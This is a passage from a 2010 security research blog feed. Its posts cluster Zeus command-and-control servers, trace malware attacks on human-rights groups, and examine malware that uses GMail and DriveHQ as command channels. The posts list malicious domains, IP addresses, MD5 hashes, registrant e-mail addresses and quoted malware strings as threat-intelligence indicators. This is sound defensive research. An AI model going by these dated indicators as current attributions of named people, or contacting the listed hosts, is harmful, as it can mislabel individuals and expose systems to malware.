<p>Domain names registered with the same e-mail address provides a stronger link because this indicates that the domain names are under the control of one entity. However, domain names registered to the same e-mail address may not be directly linked. There are a variety of services available within the malware underground that include domain registration. For example, the domain name southdomens.com (southdomens@googlemail.com) is hosted on a server that sullivanmyers.com was formerly hosted on. The server is also associated with a service that provides domain name registration. If domain registration services register domain names for multiple clients with the same e-mail address, it provides a weak (rather than strong) link between malicious activity clustered around domain names registered with the same e-mail address. Domain names registered with the same e-mail address may be distributed by the supplier to an array of disparate criminals. So, rather than indicating a strong connection between the malicious actors using the domain names, it simply shows that disparate malicious actors sought the services of the same domain name provider.</p>
<p><a href="http://www.infowar-monitor.net/wp-content/uploads/2010/12/pack_south.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2010/12/pack_south-300x138.png" alt="" title="pack_south" width="300" height="138" class="aligncenter size-medium wp-image-6714" /></a></p>
<p>Keeping these limitations in mind, I believe that while there are specialized roles within the malware ecosystem, there appears to be a significant portion that is quite centralized. In this case, domain names registered with the same e-mail addresses not only inhabit servers full of malicious activity, but are also associated with &#8220;pack mule&#8221; recruitment, exploit packs, and Zeus and Ambler command-and-control servers. While the exact nature of the connections between them are unclear, these concentrations indicate that a discrete set of criminals are behind an operation that goes full circle—from exploiting victims, to harvesting credentials to acquire goods which are relayed through a network of pack mules back to the criminals.</p>
]]></content:encoded>
			<wfw:commentRss>http://cyber.secdev.ca/2010/12/pack-mules-the-re-shipping-fraud-malware-connection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nobel Peace Prize, Amnesty HK and Malware</title>
		<link>http://cyber.secdev.ca/2010/11/nobel-peace-prize-amnesty-hk-and-malware/</link>
		<comments>http://cyber.secdev.ca/2010/11/nobel-peace-prize-amnesty-hk-and-malware/#comments</comments>
		<pubDate>Sat, 13 Nov 2010 13:45:03 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[SecDev.cyber Blog]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://cyber.secdev.ca/?p=273</guid>
		<description><![CDATA[There have been two recent attacks involving human rights and malware. First, on November 7, 2010, contagiodump.blogspot.com posted an analysis of a malware attack that masqueraded as an invitation to attend an event put on by the Oslo Freedom Forum for Nobel Peace Prize winner Liu Xiaobo. The malware exploited a known vulnerability (CVE-2010-2883) in [...]]]></description>
			<content:encoded><![CDATA[<p>There have been two recent attacks involving human rights and malware. First, on November 7, 2010, contagiodump.blogspot.com posted an <a href="http://contagiodump.blogspot.com/2010/11/cve-2010-2883-pdf-invitation-to-nobel.html">analysis</a> of a malware attack that masqueraded as an invitation to attend an event put on by the Oslo Freedom Forum for Nobel Peace Prize winner Liu Xiaobo. The malware exploited a known vulnerability (CVE-2010-2883) in Adobe Reader/Acrobat. The <a href="http://cpj.org/internet/2010/11/that-nobel-invite-mr-malware-sent-it.php">Committee to Protect Journalists was hit</a> by the same attack. </p>
<p>On November 10, 2010 Websense <a href="http://community.websense.com/blogs/securitylabs/archive/2010/11/10/Amnesty-International-Hong-Kong-Website-Injected-With-Latest-Internet-Explorer-0_2D00_day-.aspx">reported</a> that website of Amnesty Hong Kong was compromised and was delivering an Internet Explorer 0day exploit (CVE-2010-3962) to visitors. In addition, Websense reports that the same malicious server was serving three additional exploits: a Flash exploit (CVE-2010-2884), a QuickTime exploit (CVE-2010-1799) and a Shockwave exploit (CVE-2010-3653).</p>
<p>The malicious domain name hosting the exploits mailexp.org (74.82.168.10) has been serving malware since<a href="http://webcache.googleusercontent.com/search?q=cache:p0PfwBbADr4J:report.xandora.net/2010/09/file-analyzer-2c553859b4ac40875aa418791bff3bd295d6c04d/+%22mailexp.org%22&#038;cd=7&#038;hl=en&#038;ct=clnk&#038;gl=ca"> Sept. 2010</a>. The domain mailexp.org was registered in May 2010 to y_yum22@yahoo.com. mailexp.org was formerly hosted on 74.82.172.221 which now hosts the Zhejiang University Alumni Association website.</p>
<blockquote><p>
The malware dropped from the Internet Explorer exploit (CVE-2010-3962)<br />
scvhost.txt<br />
MD5: ca80564d93fbe6327ba6b094ae3c0445  <a href="http://www.virustotal.com/file-scan/report.html?id=d354022acae7c68b12002e3a51c7f1212bc7a38fbec4507847b302a84cbca50f-1289449336">VT: 2 /43</a></p>
<p>The malware dropped from the Flash exploit (CVE-2010-2884)<br />
hha.exe<br />
MD5: 0da04df8166e2c492e444e88ab052e9c <a href="http://www.virustotal.com/file-scan/report.html?id=620f20587b3874ab88e802963308f6c2c50b0629260c58a2a19bc5bcd914130a-1289376340">VT: 2 /43</a></p>
<p>The malware dropped from the QuickTime exploit (CVE-2010-1799)<br />
qq.exe<br />
MD5: 3e54f1d3d56d3dbbfe6554547a99e97e  <a href="http://www.virustotal.com/file-scan/report.html?id=c71731fd86e1728ca7604ca57f9beba8963a0a9cc0c48c10a74b2c21e9652e5d-1289380867">VT: 16 /43</a></p>
<p>The malware dropped from the Shockwave exploit (CVE-2010-3653)<br />
pdf.exe<br />
MD5: 3a459ff98f070828059e415047e8d58c  <a href="http://www.virustotal.com/file-scan/report.html?id=72d2df74c963835a7b2419fc772d3f3b4e00c6ba5e74926c00103c8594b7ab66-1289437844">VT: 0/43</a>
</p></blockquote>
<p>Both ca80564d93fbe6327ba6b094ae3c0445 and 3a459ff98f070828059e415047e8d58c perform a DNS lookup for ns.dns3-domain.com, which is an alias for centralserver.gicp.net which resolves to 221.218.165.24 (China Unicom Beijing province network).</p>
<p>The domain name &#8220;ns.dns3-domain.com&#8221; has been associated with a variety of malware going back to <a href="http://www.threatexpert.com/report.aspx?md5=caaa30edf0a496ab2d635bea961eb1f7">May 2010</a>. This domain name, dns3-domain.com is registered to zhanglei@netthief.net, the developer of the NetThief RAT.</p>
<p>Malware attacks leveraging human rights issues are not new. I have been documenting them for some time (see, <a href="http://www.nartv.org/2010/07/29/human-rights-and-malware-attacks/">Human Rights and Malware Attacks</a>, <a href="http://www.nartv.org/2009/09/28/targeted-malware-attack-on-foreign-correspondent%E2%80%99s-based-in-china/">Targeted Malware Attack on Foreign Correspondent’s based in China</a>, <a href="http://www.nartv.org/2009/10/28/0day-civil-society-and-cyber-security/">&#8220;0day&#8221;: Civil Society and Cyber Security</a>). However, one of the issues that Greg Walton and I <a href="http://www.nartv.org/2009/10/28/0day-civil-society-and-cyber-security/">raised</a> last year, is a trend toward using the real web sites of human rights organizations compromised and as vehicles to deliver 0day exploits to the visitors of the sites – many of whom may be staff and supporters of the specific organization. Unfortunately, we can expect this to continue.</p>
]]></content:encoded>
			<wfw:commentRss>http://cyber.secdev.ca/2010/11/nobel-peace-prize-amnesty-hk-and-malware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Clustering Zeus Command and Control Servers Part 2</title>
		<link>http://cyber.secdev.ca/2010/11/clustering-zeus-command-and-control-servers-part-2/</link>
		<comments>http://cyber.secdev.ca/2010/11/clustering-zeus-command-and-control-servers-part-2/#comments</comments>
		<pubDate>Fri, 05 Nov 2010 20:02:31 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[SecDev.cyber Blog]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Palantir]]></category>
		<category><![CDATA[zeus]]></category>

		<guid isPermaLink="false">http://cyber.secdev.ca/?p=271</guid>
		<description><![CDATA[In Part 1 of &#8220;Clustering Zeus Command and Control Servers&#8221; I focused on clustering Zeus command and control servers based on three criteria: IP addresses, domain names, and email addresses used to register domain names. Using data drawn from ZeusTracker and MalwareDomainList, I observed that while a wide variety of criminals may set up disparate [...]]]></description>
			<content:encoded><![CDATA[<p>In Part 1 of &#8220;<a href="http://www.nartv.org/2010/10/14/clustering-zeus-command-and-control-servers/">Clustering Zeus Command and Control Servers</a>&#8221; I focused on clustering Zeus command and control servers based on three criteria: IP addresses, domain names, and email addresses used to register domain names. Using data drawn from ZeusTracker and MalwareDomainList, I observed that while a wide variety of criminals may set up disparate Zeus operations there may be “core” set of Zeus operations clustered around domain names registered five email addresses: abuseemaildhc@gmail.com, hilarykneber@yahoo.com, steven_lucas_2000@yahoo.com, tahli@yahoo.com and michell.gregory2009@yahoo.com. Beyond the common email addresses and co-hosting on servers with the same IP addresses (which, in general are hosting a wide variety of malware) the exact nature of the relationships remains unclear. </p>
<p>It is clear that there are certain servers that facilitate an abundance of malicious activity. However, caution must be exercised when conclusions are drawn regarding specific (groups of) actors operating discrete segments of botnet command and control servers among a common malicious infrastructure. Malware groups are often the customers of other malware groups or work with affiliates to propagate and monetize malware. Different groups may propagate malicious domain names that belong to other groups, or different groups may propagate common malicious domains that are provided by an affiliate network. In addition, there are malicious networks that provide hosting services to malware distributors and botnet operators. Therefore, links that appear between a variety of actors may not be as solid as the technical data alone would lead one to believe. </p>
<p>In order to examine these relationships further, I&#8217;m going to layer some qualitative data and analysis on the Zeus data analyzed in Part 1. Based on information I obtained from some of the command and control servers listed below (this is deliberately vague), combined with common file paths and the presence of the same files on different combinations of these servers,  I believe that the following command and control domain names constitute of cluster of malicious activity operated by the same set of operators:</p>
<blockquote><p>
freehost21.tw – hilarykneber@yahoo.com &#8211; 109.196.143.60<br />
bstservice.biz – accounseller@gmail.com &#8211; 195.5.161.73<br />
fivefingers31.org – edgar.marcha@verizon.net &#8211; 195.149.88.86<br />
coolparts31.tw – admin@google.name &#8211; 121.101.216.205<br />
fhjslk21.com.tw – hilarykneber@yahoo.com &#8211; 195.5.161.208<br />
bananajuice21.net – hilarykneber@yahoo.com &#8211; 109.196.143.56<br />
cpadm21.cn – Dalas_Illarionov@yahooo.com &#8211; 91.212.41.31<br />
gamecp12.cn – GameNet2010TX@yahoo.com &#8211; 222.73.37.203<br />
admcp21.cn – Maria_lucas_2000@yahoo.com &#8211; 91.212.41.31<br />
subaruservice.cn – hilarykneber@yahoo.com &#8211; 59.125.229.79<br />
elektronservice.net – Steven Lucas steven_lucas_2000@yahoo.com &#8211; 59.125.229.79<br />
promo-standart.info – MillieDiaz4@aol.com &#8211; 121.101.216.205<br />
cpadm21.org – admin@cpadm21.org &#8211; 193.104.94.81<br />
decp31.org – hilarykneber@yahoo.com &#8211; 119.255.23.209<br />
coolparts31.org – skeletor71@comcast.net &#8211; 61.4.82.216<br />
sosanni.com – migray71@yahoo.com &#8211; 121.101.216.205
</p></blockquote>
<p>This post will explore the relationships between these domains and other malicious activity, primarily Zeus activity, undertaken by other domain names registered with the same email addresses in order to explore the theory that there is a &#8220;core&#8221; of Zeus activity. While the malicious activity primarily relates to Zeus there are some significant exceptions. The domain name sosanni.com was used as a command and control server for <a href="http://www.nartv.org/2010/08/04/the-ambler-botnet/">the Ambler botnet</a>. For the period I observed the Ambler activity, over 5000 IP addresses from compromised computers, 99% of which were from Russia, checked in with the command and control server. In addition, I <a href="http://www.nartv.org/2010/06/09/a-random-walk-through-the-malware-ecosystem/">found</a> that coolparts31.tw was acting as a SpyEye command and control server in addition to a Zeus command and control server.</p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/10/z2_cluster.png"><img src="http://www.nartv.org/wp-content/uploads/2010/10/z2_cluster_s.png" alt="" title="z2_cluster_s" width="400" height="244" class="aligncenter size-full wp-image-1765" /></a></p>
<p>This screenshot shows the relationship between the command and control domain names, the malicious activity associated with them and the IP address that the domain name resolves to.  While there are several instances in which some domain names were co-hosted on the same server, nearly half were not. This makes sense as operators will seek to diversify their hosting in order to avoid a complete shutdown should one of their command and control servers be taken down or blocked. In fact, look at the time span, covering October 2009 to September 2010 we can see how the operators moved their operations from one server to the next.</p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/10/z2_banana_heatmap.png"><img src="http://www.nartv.org/wp-content/uploads/2010/10/z2_banana_heatmap_s.png" alt="" title="z2_banana_heatmap_s" width="400" height="244" class="aligncenter size-full wp-image-1771" /></a></p>
<p>This operators of this malware cluster tend to host their command and control servers in Eastern Europe and China.</p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/10/z2_heatmap.png"><img src="http://www.nartv.org/wp-content/uploads/2010/10/z2_heatmap_s.png" alt="" title="z2_heatmap_s" width="400" height="244" class="aligncenter size-full wp-image-1796" /></a></p>
<p>In order to assess this clusters possible linkages within the broader malware ecosystem, the data set was expanded to include a) other domain names registered with the same email addresses and b) the IP addresses of the servers associated with the malicious activity imported from ZeusTracker and MalwareDomainList. This extends the geographic scope of the hosting servers into North America, as well as the previous locations in Eastern Europe (UA, RU, CZ, MD) and South East Asia (CN, TW).</p>
<p>Looking at the relationships between the domains we see that there are two interesting clusters, and arguable a few smaller ones as well. These represent concentrations of servers registered with the same email addresses. The two main clusters are domain names registered to: steven_lucas_2000@yahoo.com and hilarykneber@yahoo.com.</p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/10/z2_lucas.png"><img src="http://www.nartv.org/wp-content/uploads/2010/10/z2_lucas_s.png" alt="" title="z2_lucas_s" width="400" height="244" class="aligncenter size-full wp-image-1802" /></a></p>
<p>An interesting fact about the &#8220;Lucas&#8221; cluster becomes apparent when you look at the time line of malicious activity (the date when the domain name was added to ZeusTracker or MalwareDomainList). The Lucas cluster is primarily active January &#8211; November 2009 (although there is some subsequent activity) while very few domains registered with other email addresses are active.</p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/10/z2_kneber.png"><img src="http://www.nartv.org/wp-content/uploads/2010/10/z2_kneber_s.png" alt="" title="z2_kneber_s" width="400" height="244" class="aligncenter size-full wp-image-1804" /></a></p>
<p>This is followed by the introduction of the &#8220;Kneber&#8221; domains which begin on the tail end of the Lucas cluster&#8217;s activity. The Kneber domain names begin in November 2009 and continue into October 2010. While the domain names registered with the remaining email addresses do also roughly follow a similar pattern of beginning while the previous one tails off, Kneber remains fairly constant once it begins.</p>
<p>In Part 1, I showed that there are clusters of Zeus activity that around a set of email addresses used to register domain names. Using qualitative data from my investigations, I&#8217;ve found a Zeus cluster that uses domain names registered by some, but not all, of these key email addresses including steven_lucas_2000@yahoo.com and hilarykneber@yahoo.com. This cluster has transitioned through  domain names registered by a variety of email addresses over the last year. When the data set is expanded to include all the domain names registered by these email addresses in ZeusTracker and MalwareDomainList we see the same pattern of transition play out. This supports the theory that while Zeus is a toolkit that allows anyone to create a botnet, there is a &#8220;core&#8221; of Zeus activity.</p>
<p>However, this cluster of 16 domain names is only a small portion of the &#8220;core&#8221; Zeus activity associated with five key email addresses. According to DomainTools, about 1839 domain names in total:</p>
<blockquote><p>
abuseemaildhcp@gmail.com is associated with about 717 domains<br />
hilarykneber@yahoo.com is associated with about 449 domains<br />
steven_lucas_2000@yahoo.com is associated with about 110 domains<br />
tahli@yahoo.com is associated with about 263 domains<br />
michell.gregory2009@yahoo.com is associated with about 300 domains
</p></blockquote>
<p>These email addresses have been used to registered a variety of domain names associated with all manner of malicious activity, not exclusively Zeus activity. While this could be part of a centralized effort to distribute command and control servers to be operated by sub-groups, I am not sure that it is best to attribute all the malicious activity across these domains to the same set of actors. Even if these domain names represent the efforts of the same set of actors, they appear to be distributed to smaller groups of operators. These operators don&#8217;t necessarily have connections with others managing domain names hosted on the same infrastructure and/or registered with the same email addresses. </p>
<p>However, this simple clustering method does provide us with concentrations of malicious activity that should be investigated further. The introduction of qualitative data provides the ability to probe the operations of specific groups further. In the future I&#8217;d like to acquire a list of all 1800 domain names and layer on historical hosting data to see if any further patterns emerge.</p>
]]></content:encoded>
			<wfw:commentRss>http://cyber.secdev.ca/2010/11/clustering-zeus-command-and-control-servers-part-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Command and Control in the Cloud</title>
		<link>http://cyber.secdev.ca/2010/10/command-and-control-in-the-cloud/</link>
		<comments>http://cyber.secdev.ca/2010/10/command-and-control-in-the-cloud/#comments</comments>
		<pubDate>Fri, 22 Oct 2010 14:17:55 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[SecDev.cyber Blog]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Social Engineering]]></category>

		<guid isPermaLink="false">http://cyber.secdev.ca/?p=268</guid>
		<description><![CDATA[In &#8220;Shadows in the Cloud: An investigation into cyber espionage 2.0&#8221; my co-authors and I analyzed the command and control infrastructure of a network that extracted secret, confidential and restricted documents from the Indian government and military. The Shadow Network used a complex and tiered command and control infrastructure that leveraged Twitter, Google Groups, Blogspot, [...]]]></description>
			<content:encoded><![CDATA[<p>In &#8220;<a href="http://www.nartv.org/mirror/shadows-in-the-cloud.pdf">Shadows in the Cloud: An investigation into cyber espionage 2.0</a>&#8221; my co-authors and I analyzed the command and control infrastructure of a network that extracted secret, confidential and restricted documents from the Indian government and military. The <em>Shadow Network</em> used a  complex and tiered command and control infrastructure that leveraged Twitter, Google Groups, Blogspot, Baidu Blogs, blog.com and Yahoo! Mail in order to maintain persistent control over the compromised computers. As we noted in the report, the use of these services as elements of command and control is certainly not new:</p>
<blockquote><p>The use of social networking sites as elements of command and control for malware networks is not novel. The attackers leverage the normal operation of these systems in order to maintain control over compromised system. In 2009, researchers found that Twitter, Jaiku, Tumblr, Google Groups, Google AppEngine and Facebook had all been used as the command and control structure for malware. In August 2009, Arbor Networks’ Jose Nazario found that Twitter was being used as a command and control component for a malware network. In this case, the malware was an information stealer focused on extracting banking credentials from compromised computers located mostly in Brazil. Twitter was not the only channel being used by the attackers. They also used accounts on Jaiku and Tumblr (<a href="http://asert.arbornetworks.com/2009/08/twitter-based-botnet-command-channel">Nazario 2009a</a>). Furthermore, Arbor Networks found another instance of malware that used the Google AppEngine to deliver malicious URLs to compromised computers (<a href="http://asert.arbornetworks.com/2009/11/malicious-google-appengine-used-as-a-cnc">Nazario 2009b</a>). The Unmask Parasites blog found that obfuscated scripts embedded in compromised web sites used the Twitter API to obscure their activities. While the method was clever, the code was unreliable and appeared to have been abandoned by the attackers (<a href="http://blog.unmaskparasites.com/2009/11/11/hackers-use-twitter-api-to-trigger-malicious-scripts">Unmask Parasites 2009</a>). Symantec found that Google Groups were being used as command and control for another instance of malware. In this case, a private Google group was used by the attackers to send commands to compromised computers which then uploaded their responses to the same Group (<a href="http://www.symantec.com/connect/blogs/trojanwhitewell-what-s-your-bot-facebook-status-today">Symantec 2009a</a>) Symantec also found an instance of malware that used Facebook status messages as a mechanism of command and control. (<a href="http://www.symantec.com/connect/blogs/google-groups-trojan">Symantec 2009b</a>). The use of these social networking and Web 2.0 tools allows the attackers to leverage the normal operation of these tools to obscure the command and control functions of malware.</p></blockquote>
<p>Earlier this year, Sunbelt found a <a href="http://sunbeltblog.blogspot.com/2010/05/diy-twitter-botnet-creator.html">Twitter botnet creator</a> and Trend Micro <a href="http://blog.trendmicro.com/the-malicious-intent-of-the-here-you-have-mail-worm-part-1/">reports</a> that the &#8220;Here You Have&#8221; worm used GMail accounts. As we found with the <em>Shadow Network</em> malware authors learn from each other. And in the case of the <em>Shadow Network</em> they didn&#8217;t just use one service they used six of them, including Yahoo! Mail. And while indiscriminate malware may be rather noisy, the malware used in targeted attacks tends to be (but is certainly not always) more discrete. </p>
<p>A recent <a href="http://contagiodump.blogspot.com/2010/10/oct-08-cve-2010-2883-pdf-nuclear.html">sample</a> posted at contagiodump.blogspot.com caught my attention for this very reason. The sample, &#8220;Conference Information_2010 IFANS Conference on Global Affairs (1001).pdf&#8221; (which was sent from 221.9.247.17 and was detected by <a href="http://www.virustotal.com/file-scan/report.html?id=0c8f17b2130addebcb2ca75bd7a982e37ddcc49d49e79fe60e3fda767f2ec972-1287057726">14  /43 (32.6%)</a> AV products at Virustotal) arrived with the subject line &#8220;Nuclear Challenges and Responses in the Century&#8221; and exploited a vulnerability in Adobe Reader/Acrobat (CVE-2010-2883) to drop malware on the targets&#8217; computers. For those of you who follow Mila&#8217;s awesome blog, this scenario is hardly surprising.</p>
<p>But a few things caught my attention. There were references in the strings dumped from a file the malware created (syschk.ocx) that referenced GMail (mail.google.com) and DriveHQ (drivehq.com), which describes itself as a &#8220;cloud based storage, backup, group sharing and collaboration service.&#8221; When you look at the traffic generated by the malware you&#8217;ll see connections to these locations. </p>
<p>There is nothing about these locations that is very suspicious &#8212; everyone checks their GMail right?  Moreover, the connection to GMail is SSL encrypted.  </p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/10/gmailburp.png"><img src="http://www.nartv.org/wp-content/uploads/2010/10/gmailburp-300x101.png" alt="" title="gmailburp" width="300" height="101" class="aligncenter size-medium wp-image-1787" /></a></p>
<p>Using <a href="http://portswigger.net/burp/">Burp</a> (which made the process very simple)  I MITM&#8217;d the traffic between the malware and GMail. The malware logs in to the GMail account and sends an email to another GMail address. The content of this email is encrypted. However, I believe that what it is sending &#8212; although this is just a hunch &#8212; is the content of another file the malware generates: form.ocx. This file contains what appears to be a unique ID assigned by the malware, the hostname and IP address, the default home page of the default browser and a listing of installed programs on the computer. The end of the file contains information about executables the malware has impacted.  In addition to the encrypted message sent through the GMail account, the Unique ID in form.ocx appears at the beginning of the message.</p>
<blockquote><p>
IEXPLORE.EXE done<br />
CHROME.EXE done<br />
FIREFOX.EXE done</p>
<p>C:\WINDOWS\system32\form.ocx<br />
Infect OK!
</p></blockquote>
<p>I have not looked into what exactly the malware does to these applications, but it basically disables the operation of FireFox and Chrome and instead connect to the Gmail account when you try to start these applications. Internet Explorer seems to function normally.</p>
<p>The connection to fuechei.chang.drivehq.com results in the download of an additional file rename.ocx which appears to be very similar, when its strings are compared with, syschk.ocx. It then renames syschk.ocx to syschk.ocx1. You can see that this correlates with text in the strings dumped from syschk.ocx.</p>
<blockquote><p>
%s\rename.ocx</p>
<p>http://%s/rename</p>
<p>%s\syschk.ocx1
</p></blockquote>
<p>After the initial connections to GMail and DriveHQ the malware went quiet. I never did get it to connect again.</p>
<p>As network defenses continue to include traffic analysis, I believe that we will continue to see a move toward using popular services, especially web mail as command and control elements. Unlike connections to well-known dynamic DNS services like 3322.org or abnormal connections to geographic regions, connections to GMail and other popular services do not necessarily stand out. Moreover, the connections to the services, such as GMail are encrypted, further obfuscating the malicious activity that is occurring. </p>
]]></content:encoded>
			<wfw:commentRss>http://cyber.secdev.ca/2010/10/command-and-control-in-the-cloud/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Clustering Zeus Command and Control Servers</title>
		<link>http://cyber.secdev.ca/2010/10/clustering-zeus-command-and-control-servers/</link>
		<comments>http://cyber.secdev.ca/2010/10/clustering-zeus-command-and-control-servers/#comments</comments>
		<pubDate>Thu, 14 Oct 2010 15:16:16 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[SecDev.cyber Blog]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Palantir]]></category>
		<category><![CDATA[zeus]]></category>

		<guid isPermaLink="false">http://cyber.secdev.ca/?p=266</guid>
		<description><![CDATA[Recently, more than 150 individuals around the world have been arrested on bank fraud related charges after using the Zeus malware to acquire credentials that enabled the criminals to steal more than $70 million dollars. Those arrested include five Ukrainian individuals that are believed to be the masterminds behind the operation. Brian Krebs notes that [...]]]></description>
			<content:encoded><![CDATA[<p>Recently, more than 150 individuals around the world have been <a href="http://www.zdnet.co.uk/news/security-management/2010/10/04/fbi-stresses-international-co-operation-in-zeus-arrests-40090386/">arrested</a> on bank fraud related charges after using the <a href="http://us.trendmicro.com/imperia/md/content/us/trendwatch/researchandanalysis/zeusapersistentcriminalenterprise.pdf">Zeus malware</a> to acquire credentials that enabled the criminals to steal more than $70 million dollars. Those arrested include five Ukrainian individuals that are believed to be the <a href="http://krebsonsecurity.com/2010/10/ukraine-detains-5-individuals-tied-to-70-million-in-ebanking-heists/">masterminds</a> behind the operation. Brian Krebs <a href="http://krebsonsecurity.com/2010/10/zeus-busts-bring-botnet-beatdown/">notes</a> that there is a correlation between the decreasing number of active Zeus command and control servers and the timing of the arrests. </p>
<p>This is interesting because while &#8220;the media&#8221; often portrays Zeus as &#8220;a botnet&#8221; the security community rightly points out that Zeus is a malware toolkit not &#8220;a&#8221; botnet and that there are multiple Zeus botnets. However, what explains the decrease in Zeus command and control servers with the disruption of just one Zeus operation? While it is certainly true that any aspiring criminal can acquire Zeus and begin his or her own operation, is there a Zeus &#8220;core&#8221; that is organized and connected through links the criminal underground? Having just returned from <a href="http://www.palantirtech.com/govcon">Palantir&#8217;s Govcon</a> feeling inspired I imported Zeus data from the <a href="http://www.malwaredomainlist.com/">MalwareDomainList</a> and the <a href="https://zeustracker.abuse.ch/">ZeusTracker</a> to explore the links between Zeus command and control servers.</p>
<p>While there are definitely more indicators, I focused on three: IP addresses, domain names, and email addresses used to register domain names. The IP addresses represent the servers that are used to host command and control servers. One such server may host multiple command and control servers allowing one to cluster malicious domain names that are hosted on the same server. Domain names are useful indicators but essential have a one-to-one relationship so it is more valuable to cluster them by the email address used to register the domain name. Using these indicators the Zeus command and control domain names can be clustered based on co-hosting (on the same IP address) and mutual registration (same email address). This may provide some indication if there is a &#8220;core&#8221; or Zeus activity.</p>
<p>However, there are significant limitations to bear in mind. Malicious hosting services are available in the criminal underground, so while a single server may be a hotspot of malware activity, it may not be directly related. On the other hand, some command and control servers may be using <a href="http://threatinfo.trendmicro.com/vinfo/articles/securityarticles.asp?xmlfile=030210-ZBOT.xml">fast flux</a> which would negate clustering by IP address altogether. Some command and control servers are based on IP addresses only and do not have domain names associated with them. On the other hand, a single domain name may be used for a variety of purposes. (For example, I have found a domain name that hosts both a Zeus and a SpyEye command and control server, despite the reported rivalry between them). In addition, the botnet operators may register a variety of domain names from a variety of email addresses. In such cases, clustering by email addresses would not yield significant links. Finally, there may be suppliers of domain names in them malware underground that register domain names with email addresses under their control, but sell the domains names to other criminals. In such cases, while the email address may be the same, the operators of botnets may not be directly related.</p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/10/zeus_heatmap.png"><img src="http://www.nartv.org/wp-content/uploads/2010/10/zeus_heatmap_small.png" alt="" title="zeus_heatmap_small" width="400" height="243" class="aligncenter size-full wp-image-1718" /></a></p>
<p>The data set used contains 5,907 domain names (control servers) and 4,505 IP addresses (servers) drawn from <a href="https://zeustracker.abuse.ch/">ZeusTracker</a> and <a href="http://www.malwaredomainlist.com/">MalwareDomainList</a> (where the activity on MDL contains &#8220;zeus&#8221;). Here, 4,505 IP addresses have been geocoded (not all were successfully geocoded) and displayed using Palantir&#8217;s heatmap. While there is Zeus activity hosted all over the world, there are noticeable concentrations in Europe, the Unites States and China.</p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/10/zeus_cluster.png"><img src="http://www.nartv.org/wp-content/uploads/2010/10/zeus_cluster_small.png" alt="" title="zeus_cluster_small" width="400" height="243" class="aligncenter size-full wp-image-1700" /></a></p>
<p>This cluster on the Palantir graph represents the relationship between 5,907 domain names (control servers) and 4,505 IP addresses (servers). This initial display highlights a few interesting indicators. There are several clusters that are visually apparent which show multiple domain names hosted on one server (there are three prominent &#8220;star&#8221; clusters and several smaller ones) and there is a discernible &#8220;tree&#8221; structure in the center indicating relationships between single domain names that have been hosted on multiple IP addresses. And we can see thaht there are some familiar IP addresses used to register multiple domain names, the most notable being &#8220;hilarykneber@yahoo.com&#8221; which is the email addresses behind the <a href="http://www.netwitness.com/resources/kneber.aspx">Kneber botnet</a>.</p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/10/zeus_zoom.png"><img src="http://www.nartv.org/wp-content/uploads/2010/10/zeus_zoom_small.png" alt="" title="zeus_zoom_small" width="400" height="244" class="aligncenter size-full wp-image-1707" /></a></p>
<p>Zooming in to some of the clusters reveals some interesting behaviors. In this example, one server is hosting 60 domain names.  These 60 domain names were registered with 17 different email addresses.  And when some <a href="http://www.malwaredomainlist.com/mdl.php?search=218.93.248.232&#038;colsearch=All&#038;quantity=All&#038;inactive=on">additional information from MDL</a> is brought in, we see that most of the domains are hosting a Zeus executable with the same name &#8220;patch.exe&#8221; and that there is a naming convention. For example, &#8220;1-adm.com/patch.exe&#8221; was registered with &#8220;obeys@infotorrent.ru&#8221;  while &#8220;1-adm.net/patch.exe&#8221; was registered with &#8220;yam@ml3.ru&#8221;. These domain names were all added to MDL around the same time and despite the multiple email addresses it does appear as if this is a single campaign. </p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/10/zeus_email.png"><img src="http://www.nartv.org/wp-content/uploads/2010/10/zeus_email_small.png" alt="" title="zeus_email_small" width="400" height="243" class="aligncenter size-full wp-image-1712" /></a></p>
<p>In order to explore the question of whether or not there is a Zeus &#8220;core&#8221; of some sort, I filtered the domain names and IP addresses to those registered with the top five appearing email addresses (with the exception of contact@privacyprotect.org which is the email address given for those who have used this domain privacy service).  Domain names registered with these five email addresses account for 6.09% (360/5907) of the Zeus command and control servers. However, this number increases to 17.9% (360/2004) when the number of control servers is restricted to those that contain email data. In addition to several &#8220;star&#8221; clusters as well a &#8220;tree&#8221; in the middle of the graph, we see that these email addresses have been actively propagating Zeus for approximately one year. (The time is derived from when the domain is added to either the MDL or ZeusTracker lists, which is used a rough indicator of when a domain became active). </p>
<p><a href="http://www.nartv.org/wp-content/uploads/2010/10/zeus_kneber.png"><img src="http://www.nartv.org/wp-content/uploads/2010/10/zeus_kneber_small.png" alt="" title="zeus_kneber_small" width="400" height="243" class="aligncenter size-full wp-image-1729" /></a></p>
<p>When the selection is restricted to only those domain names registered by &#8220;hilarykneber@yahoo.com&#8221; we can see that these domains are represented across most of the clusters indicating that many of these domain are co-hosted on the same IP addresses with those registered by our other top email addresses. In addition, the &#8220;kneber&#8221; domain names are active through this year long period of data. </p>
<p>While a wide variety of criminals may set up disparate Zeus operations, clustering the Zeus command and control infrastructure in this way indicates that there is some evidence to support claims of a &#8220;core&#8221; set of Zeus operations. This may be one explanation for the observed decrease in active Zeus command and control servers.</p>
